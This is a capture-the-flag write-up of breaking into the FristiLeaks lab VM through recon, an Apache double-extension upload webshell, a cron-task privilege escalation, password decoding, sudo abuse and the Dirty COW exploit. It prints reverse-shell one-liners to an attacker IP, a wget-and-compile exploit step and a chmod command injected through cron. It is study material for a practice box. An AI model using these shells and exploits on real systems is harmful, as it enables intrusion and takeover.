# Lab setup
The download is an OVA. Open it in the hypervisor and import the OVA; the import throws an error once, just click retry. After importing, add a network adapter in NAT mode and set that NAT adapter's MAC address to 08:00:27:A5:A6:76 (under the Advanced tab in the adapter settings).
Environment setup reference: https://blog.csdn.net/weixin_45744814/article/details/120168008
IP address: 192.168.74.138
# Information gathering
# nmap
Do a quick full-port scan:
```text
┌──(root㉿kali)-[~]
└─# nmap -p- -T5 192.168.74.138
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 04:08 EDT
Nmap scan report for bogon (192.168.74.138)
Host is up (0.00045s latency).
Not shown: 65479 filtered tcp ports (no-response), 55 filtered tcp ports (host-prohibited)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 71.77 seconds
```
Only port 80 is open, which is interesting; this is most likely going to be a web security box.
# dirsearch
```text
┌──(root㉿kali)-[~]
└─# dirsearch -u 192.168.74.138
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict
  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/_192.168.74.138/_24-04-08_04-10-32.txt

Target: http://192.168.74.138/

[04:10:38] Starting:
[04:10:41] 403 -  213B - /.ht_wsr.txt
[04:10:41] 403 -  216B - /.htaccess.bak1
[04:10:41] 403 -  218B - /.htaccess.sample
[04:10:41] 403 -  216B - /.htaccess.save
[04:10:41] 403 -  217B - /.htaccess_extra
[04:10:41] 403 -  216B - /.htaccess_orig
[04:10:41] 403 -  216B - /.htaccess.orig
[04:10:41] 403 -  214B - /.htaccess_sc
[04:10:41] 403 -  214B - /.htaccessOLD
[04:10:41] 403 -  207B - /.html
[04:10:41] 403 -  206B - /.htm
[04:10:41] 403 -  214B - /.htaccessBAK
[04:10:41] 403 -  215B - /.htaccessOLD2
[04:10:41] 403 -  216B - /.htpasswd_test
[04:10:41] 403 -  212B - /.htpasswds
[04:10:41] 403 -  213B - /.httr-oauth
[04:11:04] 403 -  210B - /cgi-bin/
[04:11:13] 403 -  208B - /error/
[04:11:19] 301 -  237B - /images  ->  http://192.168.74.138/images/
[04:11:19] 200 -    1KB - /images/
[04:11:40] 200 -   62B - /robots.txt

Task Completed
```
dirsearch didn't turn up anything particularly valuable either.
# nikto
```text
┌──(root㉿kali)-[~]
└─# nikto -h 192.168.74.138
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.74.138
+ Target Hostname:    192.168.74.138
+ Target Port:        80
+ Start Time:         2024-04-08 04:10:58 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
+ /: Server may leak inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: Tue Nov 17 13:45:47 2015. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /robots.txt: Entry '/cola/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/sisi/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/beer/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 3 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.0.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.3.3 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE .
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ PHP/5.3 - PHP 3/4/5 and 7.0 are End of Life products without support.
+ /icons/: Directory indexing found.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8911 requests: 0 error(s) and 17 item(s) reported on remote host
+ End Time:           2024-04-08 04:11:32 (GMT-4) (34 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
nikto points us to robots.txt, which lists a few entries that might be interesting.
# Imagination
Three directories, and each one just shows an image. Steganography? That makes no sense ==、
Looked at someone else's writeup and it turns out we're meant to find the path ourselves ==、 The hints are THIS IS NOT THE URL and the image on the home page.
Fine, that counts as information gathering too. Pretty abstract.
Guessing gets us http://192.168.74.138/fristi/. For someone with as little imagination as me this is a real headache. I thought about a crawler, but the page is too scattered for that to work, so it would have to be enumeration. But why would you enumerate? There's no reason to!
# Image
Opened the path and found a login form. Confusing.
Two things to try now: SQL injection and information gathering. This box feels like a joke box. Checked the source with F12 and found a comment containing Base64; decoding it gave an image, and the text in the image reads keKkeKKeKKeKkEkkEk. Not sure what it's for; it felt like mockery. Tried it as both a password and a path with no result.
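The "comment full of Base64" step above can be automated: pull every HTML comment, keep the ones whose body is valid base64, decode them and identify the file type by magic bytes. This is an added example, not code from the writeup; the HTML is a constructed sample (the blob is a 1x1 PNG so it runs offline), not the box's real page.

```python
import base64
import binascii
import re

# Constructed sample page standing in for the login page's HTML source: one
# comment carries a base64 blob (a 1x1 PNG, so the script runs offline), the
# other is an ordinary developer note that must not be mistaken for data.
SAMPLE_HTML = """<html><body>
<!-- iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg== -->
<!-- TODO: clean this up for production -->
<form method="post">...</form>
</body></html>"""

BASE64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")
MAGIC = {b"\x89PNG\r\n\x1a\n": "png", b"\xff\xd8\xff": "jpeg", b"GIF8": "gif"}

def identify(data: bytes) -> str:
    """Classify decoded bytes by magic number; anything else is 'unknown'."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"

def find_encoded_comments(html: str):
    """Return (decoded_bytes, kind) for every HTML comment whose body is valid base64."""
    found = []
    for body in re.findall(r"<!--(.*?)-->", html, re.S):
        text = "".join(body.split())  # tolerate blobs wrapped across lines
        # short bodies, bad padding length or non-alphabet chars are plain comments
        if len(text) < 16 or len(text) % 4 or not BASE64_RE.fullmatch(text):
            continue
        try:
            data = base64.b64decode(text, validate=True)
        except binascii.Error:
            continue
        found.append((data, identify(data)))
    return found

if __name__ == "__main__":
    for data, kind in find_encoded_comments(SAMPLE_HTML):
        print(f"{kind}: {len(data)} bytes")
```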
Back to dirsearch to scan this path again: there's an uploads folder that can't be accessed directly, which at least means there's a file upload somewhere.
Stuck. After flipping through for ages I opened the HTML source directly and noticed a comment I had missed:
```html
<!--
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.
- by eezeepz
-->
```
There's a person called eezeepz, so just log in.
Credentials: eezeepz/keKkeKKeKKeKkEkkEk
# Exploitation
# File upload
After logging in it is indeed a file upload page.
Uploaded a random php file; there's a restriction, validated on the back end. So the upload bypass has to use the information gathered so far: Apache 2.2.15. Let's go.
Looked it up: Apache has a parsing vulnerability, and the box uses a whitelist filter without renaming the uploaded file, so the upload can be pushed through by changing the extension. Upload a one-line webshell as 1.php.jpg; although the suffix is jpg it is parsed as php. Connect with AntSword and we have a low-privilege shell.
I need to go back over Apache parsing vulnerabilities and how they are exploited; I can't remember them clearly anymore.
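Added example (not code from the writeup) modelling why 1.php.jpg runs as PHP here and what the fix looks like. It assumes the extension-keyed `AddHandler php5-script .php` configuration typical of CentOS 6 php.conf (an assumption from the Apache/2.2.15 + PHP/5.3.3 banner, not something the page shows): mod_mime treats every dot-separated segment as an extension, so the handler fires on an inner `.php`, whereas a `<FilesMatch "\.php$">` SetHandler block only matches a final `.php`, and renaming on upload removes the inner segment entirely.

```python
import re
from typing import Optional

# Assumed weak configuration (not taken from the page):
#   AddHandler php5-script .php
# mod_mime applies extension-keyed directives to ANY extension in a
# multi-extension name, so "1.php.jpg" has extensions php AND jpg.
WEAK_HANDLERS = {"php": "php5-script"}
UPLOAD_WHITELIST = {"jpg", "jpeg", "png", "gif"}

def mod_mime_handler(filename: str) -> Optional[str]:
    """Model AddHandler semantics: any extension in the name may select the handler."""
    for ext in filename.lower().split(".")[1:]:
        if ext in WEAK_HANDLERS:
            return WEAK_HANDLERS[ext]
    return None

def filesmatch_handler(filename: str) -> Optional[str]:
    """Model the hardened form:  <FilesMatch "\\.php$"> SetHandler php5-script </FilesMatch>
    The anchored regex only matches when .php is the FINAL extension."""
    return "php5-script" if re.search(r"\.php$", filename, re.IGNORECASE) else None

def naive_whitelist_allows(filename: str) -> bool:
    """The upload check the writeup bypassed: it only inspects the last extension."""
    return filename.rsplit(".", 1)[-1].lower() in UPLOAD_WHITELIST

def hardened_store_name(filename: str, counter: int) -> str:
    """Rename on upload: drop the client-supplied name and keep only the
    whitelisted final extension, so no inner '.php' segment survives."""
    ext = filename.rsplit(".", 1)[-1].lower()
    if ext not in UPLOAD_WHITELIST:
        raise ValueError(f"extension not allowed: {ext}")
    return f"upload_{counter}.{ext}"

if __name__ == "__main__":
    for name in ("1.php.jpg", "shell.php", "photo.jpg"):
        print(name, naive_whitelist_allows(name),
              mod_mime_handler(name), filesmatch_handler(name))
```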
# Privilege escalation
With the apache shell in hand, the next step is privilege escalation.
# Escalating via sudo, following the hints
Checking the users, there are three. eezeepz's home directory is accessible and contains a notes.txt with hints.
Contents: Jerry has set up some automated check tasks for you, but he only allows you access to the /usr/bin/* system binaries. However, he has also copied some commonly used commands into his home directory: chmod, df, cat, echo, ps, grep, egrep, which you can use from /home/admin/. To run them, create a file named "runthis" in /tmp/, one command per line. The output is stored in /tmp/ in a file named "cronresult". These commands should run every minute with Jerry's account privileges.
So we put commands in /tmp/runthis, and every minute they are executed with Jerry's admin privileges.
I was wondering whether I even need the scheduled task.
I tried a few things as the apache account, such as checking for sudo rights, but sudo -l needs an interactive shell. I got a reverse Bash TCP shell: bash -i >& /dev/tcp/192.168.74.129/1234 0>&1, then used python to build an interactive shell: python -c 'import pty;pty.spawn("/bin/bash")'. Then sudo -l says it still needs a password.
With the apache account this probably won't work unless I go straight to a kernel exploit script.
So back to the cron job and the admin account's privileges.
Tried echo "/usr/bin/../../bin/bash -i > /dev/tcp/192.168.74.129/4455 0<& 2>&1" > /tmp/runthis to get a shell, but it didn't work; the listening nc died immediately, not sure why. My guess is that the tty isn't complete. If you know, ping me.
Just made admin's home directory accessible to every user and called it a day: echo '/usr/bin/../../bin/chmod -R 777 /home/admin' > /tmp/runthis
A minute later the admin directory can be entered, and it contains some sensitive files:
```text
bash-4.1$ cat /home/admin/whoisyourgodnow.txt
cat /home/admin/whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
bash-4.1$ cat /home/admin/cryptedpass.txt
cat /home/admin/cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
bash-4.1$ cat /home/admin/cryptpass.py
cat /home/admin/cryptpass.py
#Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
import base64,codecs,sys

def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])
print cryptoResult
```
Write a decode function to recover the two passwords (cryptpass.py does base64, reverse, rot13, so undo the steps in the opposite order):
```python
# decoderot13.py: inverse of cryptpass.py
import base64
import codecs
import sys

def decodeString(s):
    base64string = codecs.decode(s, 'rot13')      # undo rot13 (str -> str)
    return base64.b64decode(base64string[::-1])   # un-reverse, then un-base64 (bytes)

if __name__ == '__main__':
    cryptoResult = decodeString(sys.argv[1])
    print(cryptoResult.decode())
```
This gives two passwords: LetThereBeFristi! and thisisalsopw123, the passwords for fristigod and admin respectively.
Log in as fristigod:
```text
[admin@localhost uploads]$ su fristigod
su fristigod
Password: LetThereBeFristi!
bash-4.1$ whoami
whoami
fristigod
```
I already checked on admin earlier and it has no sudo rights; fristigod does:
```text
bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!
Matching Defaults entries for fristigod on this host:
    requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS
    DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1
    PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
    LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL
    LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User fristigod may run the following commands on this host:
    (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
```
Via sudo we can run /var/fristigod/.secret_admin_stuff/doCom as fristi, which can open a bash with root privileges, and that is root:
```text
bash-4.1$ sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
bash-4.1# whoami
whoami
root
```
# Dirty COW privilege escalation
Search for the Dirty COW exploit code:
```text
┌──(root㉿kali)-[~]
└─# searchsploit dirty
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                           |  Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1)                                                   | linux/dos/43199.c
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)                                                   | linux/dos/44305.c
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (SUID Method)       | linux/local/40616.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW /proc/self/mem' Race Condition Privilege Escalation (/etc/passwd Method)          | linux/local/40847.cpp
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW PTRACE_POKEDATA' Race Condition (Write Access Method)                             | linux/local/40838.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)       | linux/local/40839.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)                              | linux/local/40611.c
Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)                                                      | linux/local/50808.c
Qualcomm Android - Kernel Use-After-Free via Incorrect set_page_dirty() in KGSL                                          | android/dos/46941.txt
Quick and Dirty Blog (qdblog) 0.4 - 'categories.php' Local File Inclusion                                                | php/webapps/4603.txt
Quick and Dirty Blog (qdblog) 0.4 - SQL Injection / Local File Inclusion                                                 | php/webapps/3729.txt
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)                                                      | linux/local/46361.py
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)                                                      | linux/local/46362.py
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Paper Title                                                                                                             |  Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
DirtyTooth: Extracting VCARD data from Bluetooth iOS profiles                                                            | docs/english/42430-dirtytooth-ex
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
```
Any of them that matches the kernel version will do; I used 40839.c. Serve it from the attacking machine:
```text
┌──(root㉿kali)-[~]
└─# service apache2 start
┌──(root㉿kali)-[~]
└─# cp 40839.c /var/www/html
```
Then fetch, compile and run it on the target:
```text
bash-4.1$ wget http://192.168.74.129/40839.c -O 40839.c
wget http://192.168.74.129/40839.c -O 40839.c
bash-4.1$ gcc -pthread 40839.c -o dirty -lcrypt
gcc -pthread 40839.c -o dirty -lcrypt
./dirty 123456
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 123456
Complete line:
firefart:fi8RL.Us0cfSs:0:0:pwned:/root:/bin/bash

mmap: 7fa407cb0000
```
```text
┌──(root㉿kali)-[~]
└─# nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.74.129] from (UNKNOWN) [192.168.74.138] 37326
bash: no job control in this shell
bash-4.1$ su firefart
su firefart
standard in must be a tty
bash-4.1$ python -c 'import pty;pty.spawn("/bin/bash");'
python -c 'import pty;pty.spawn("/bin/bash");'
bash-4.1$ su firefart
su firefart
Password: 123456
[firefart@localhost uploads]#
```
Got root.
Note that you need the extra flags when compiling!
This command uses the gcc compiler to compile a source file named 40839.c and produce an executable named dirty. In detail:
- gcc: short for GNU Compiler Collection, a commonly used C compiler.
- -pthread: tells the compiler to link the POSIX threads library, to support multithreaded code.
- 40839.c: the name of the source file; .c is the usual extension for C source files.
- -o dirty: sets the name of the generated executable to dirty.
- -lcrypt: tells the compiler to link the libcrypt library, which provides password encryption and verification (crypt()).
Taken together, the command compiles the 40839.c source file into an executable named dirty, linking libcrypt during the build so the program can encrypt and verify passwords.
# Summary
- rot13 encryption
- finding useful information
- Dirty COW privilege escalation
- Apache parsing vulnerability
Urgently need to review historical Apache vulnerabilities and study how they chain together!